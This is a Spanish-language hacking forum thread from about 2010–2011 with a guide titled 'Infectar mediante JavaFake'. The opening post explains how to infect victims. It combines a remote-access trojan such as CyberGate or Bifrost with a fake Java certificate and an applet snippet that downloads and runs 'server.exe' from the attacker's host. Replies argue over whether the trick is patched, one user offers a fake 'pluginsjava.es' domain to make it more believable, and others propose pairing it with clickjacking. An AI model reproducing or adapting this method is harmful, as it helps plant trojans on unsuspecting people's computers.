comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Infectar mediante JavaFake by Devilboy

  • 11 Respuestas
  • 4717 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Neekiinh0

  • *
  • Underc0der
  • Mensajes: 28
  • Actividad:
    0%
  • Reputación 0
  • El beneficio de la duda cualquiera merece.
    • Ver Perfil
« en: Julio 23, 2010, 08:52:27 pm »
Bueno les vengo con esta guia que la probe y me andubo a la perfeccion y se las traigo para ustedes.

1- Primero que nada necesitamos un Troyano, ya sea CyberGate, Spy-Net, Bifrost o el que quieran.

2- Un servidor de descarga DIRECTA, este es el mejor: No tienes permisos para ver links. Registrate o Entra con tu cuenta

3- Una animacion flash, un script html y un certificado falso de Java aqui lo tienen elijan el servidor que quieran para descargarlo: No tienes permisos para ver links. Registrate o Entra con tu cuenta

4- Ahora cambian esta parte del code por su URL sel server:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
<applet name="link" code="Inicio.class" archive="link.jar" height="10" width="1">
      <param name="url" value="http://tu-web.com/server.exe">
    </applet>

Cambian esto:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
http://tu-web.com/server.exe

IMPORTANTE: DEBEN TENER UN HOST PARA ALOJAR TODOS LOS ARCHIVOS.


Al aceptar el certificado automaticamente se les baja el server y se lo ejecuta a la victima.

Saludos.
« Última modificación: Noviembre 04, 2014, 06:37:08 am por blackdrake »

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5401
  • Actividad:
    30%
  • Reputación 31
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #1 en: Julio 24, 2010, 10:47:57 pm »
Excelente post!
Pero esto ya no funciona ya fue parcheado.
En caso de que este errado y alguien lo haya probado actualmente y le haya funcionado por favor que lo haga saber.

Saludos y gracias por traerlo Neekiinh0


Desconectado 303010

  • *
  • Underc0der
  • Mensajes: 40
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #2 en: Julio 25, 2010, 02:05:55 am »
bueno a mi no me funciona, creo que codeare un poco aver si logro areglarlo.

Desconectado H4ZIR

  • *
  • Underc0der
  • Mensajes: 25
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #3 en: Julio 25, 2010, 08:14:21 am »
ohhhhh :O vas a codear esto XDDDD ???---->
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
<applet name="link" code="Inicio.class" archive="link.jar" height="10" width="1">
      <param name="url" value="http://tu-web.com/server.exe">
    </applet>

jajaj que me caigo :D

Desconectado FahD

  • *
  • Underc0der
  • Mensajes: 26
  • Actividad:
    0%
  • Reputación 0
  • مبروك رمضان
    • Ver Perfil
« Respuesta #4 en: Julio 25, 2010, 09:56:24 am »
Dios que de tiempo...  yo hasta tengo un dominio fake para que apareciera de remitente: pluginsjava.es
Ahora que lo pienso puedo proporcionar cuentas ftp y subdominio de ese mismo domain... ex: server01.pluginsjava.es xD cosas por el estilo para que sea más creible ^^
Quien quiera que me contacte por MP xD
PD: Buen aporte, creí que estaba por el foro por eso no lo posteaba...
Saludos

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5401
  • Actividad:
    30%
  • Reputación 31
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #5 en: Julio 25, 2010, 02:27:06 pm »
Pero seguimos dando vuelta en lo mismo! Esto no funiona ya!!! xD


Desconectado FahD

  • *
  • Underc0der
  • Mensajes: 26
  • Actividad:
    0%
  • Reputación 0
  • مبروك رمضان
    • Ver Perfil
« Respuesta #6 en: Julio 25, 2010, 02:53:24 pm »
xDDD no lo leí sorry... y hasta ahora no sabia que fué parcheado, fue bonito mientras duró xD!

Desconectado pythagoras

  • *
  • Underc0der
  • Mensajes: 1
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #7 en: Agosto 10, 2010, 03:35:00 am »
A Mi Me Funciona Lo eh probado con todos los SO esta detectado eso se pero sigue funcionando.

Desconectado Inteligencia

  • *
  • Underc0der
  • Mensajes: 13
  • Actividad:
    0%
  • Reputación 0
  • C:\WINDOWS\System32\Estoy aqui :E
    • ICQ Messenger - 1
    • MSN Messenger - jesus.inteligencia@gmail.com
    • AOL Instant Messenger - No_Tengo
    • Yahoo Instant Messenger - No_Tengo
    • Ver Perfil
    • InteProyects
« Respuesta #8 en: Agosto 10, 2010, 04:31:54 am »
Si funciona xDDDDD muchos lo usan con el clickjacking :l

Desconectado .nKs.

  • *
  • Underc0der
  • Mensajes: 2
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #9 en: Marzo 29, 2011, 01:33:41 am »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Si funciona xDDDDD muchos lo usan con el clickjacking :l

Hola disculpa las molestias.
Estube viendo eso de click jacking y queria ver como es el tema justamente para implementarlo con el JavaFake.
Ya que si se utiliza con el Js de JavaFake el cartel saldria no de la web iframe sino en la web principal, en la capa principal del clickjacking y donde aparece nuestro boton.

¿Alguien a implementado el Método con clickjacking y JavaFake?
Gracias por las respuestas. Saludos a todos

Desconectado Devilboy

  • *
  • Underc0der
  • Mensajes: 328
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #10 en: Marzo 30, 2011, 08:54:31 pm »
el metodo aún funciona pero es detectado por los AV´s

Veo Una Energia Que Con Deceo de Justicia... Veo Mas Alla de LAs Letras Escritas...
Veo Un Hacktivismo Puro... Nacido De lo Mas Profundo De un Corazon..
Con La Mirada Firme En Defender Mis Ideales...


Desconectado michoacano094

  • *
  • Underc0der
  • Mensajes: 9
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #11 en: Abril 14, 2011, 10:38:26 am »
Gracias No Entiendo Bien unso Dicen qe Si Funciona Otros Que No? xD


Toca Ver =D!

 

¿Te gustó el post? COMPARTILO!



Malware se propaga mediante "etiquetas" en Facebook

Iniciado por CodePunisher

Respuestas: 8
Vistas: 4079
Último mensaje Julio 02, 2013, 01:31:35 pm
por elshotta